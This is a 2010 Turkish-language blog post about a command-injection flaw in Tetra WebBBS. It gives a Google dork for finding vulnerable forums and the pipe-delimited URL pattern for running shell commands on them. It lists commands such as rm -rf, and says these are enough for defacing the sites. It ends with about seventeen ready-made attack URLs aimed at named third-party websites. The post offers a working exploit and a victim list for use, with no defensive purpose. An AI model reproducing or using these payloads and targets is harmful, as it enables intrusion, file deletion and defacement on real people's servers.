27 Haziran 2010 Pazar

Tetra WebBBS RCE Vulnerability

Açıgı kısaca özetleyim arkadaşlar  genel olarak bildigimiz linux komutlarını çalıştırıyor örnegin ls -lia  - lsattr - mv - cp v.b gibi komutları ama yapabildiklerimiz bu tür açıklarda kısıtlı olur genel olarak

Ben sizler için biraz site buldum bu açıgı teşkil eden..

Google Dork : Powered by Tetra-WebBBS inurl:index.cgi

Sitelerin Sonuna Eklencek Kod : index.cgi?md=read;id=1| command |
                              :  webbbs_config.pl?md=read;id=3941|command|

dir  dizin bulundugunuz dizindeki dosya ve klasörleri listeler
ls   dizin bulundugunuz dizindeki dosya ve klasörleri listeler
rm  belirtilen bir dosyayı siler
rm -rf  belirtilen bir klasörü siler
mv  belirtilen bir dosya adını 2. belirtilen bir ad olarak kayıt eder örnegin ( mv degisecek.html degisen.html )
cp belirtilen bir dosyayı belirtilen bir dizine kopyalar örnegin     ( cp dosya-1.php  /home/site/www/dosya1.php veya başka bir isimde olabilir )
id  sunucunuzdaki yetki konumudur
bu yukarda verdigim kodlar sizin bu sitelere index atmanız için hayli hayli yeter..

http://www.ourflora.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.coffeetradersforum.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.consciousparty.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.faxus.com/cgi/bbs60x/webbbs_config.pl?md=read;id=3941|dir%20-lia|
http://www.jamesasbury.net/cgi/bbs60x/webbbs_config.pl?md=read;id=3941|dir%20-lia|
http://www.commodityville.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.supportandresistance.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.coffeetradersforum.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.nragb.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.commodityville.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.supportandresistance.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.ourflora.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.ourbeacon.com/cgi-bin/bbs60x/webbbs_config.pl?md=read;id=3941|dir -lia|
http://www.miyard.com/cgi-bin/bbs5.pl?md=read;id=151721|dir -la|
http://www.friendsandtraders.com/cgi-bin/bbs60x/webbbs_config.pl/md/read/id/506|dir|
http://www.ourbeacon.com/cgi-bin/bbs60x/webbbs_config.pl/md/read/id/314123119154990|dir -lia|
http://209.62.93.234/esl-tesol-jobs/index.cgi?page=1;md=read;id=75042|dir -lia|

Hiç yorum yok :

Yorum Gönderme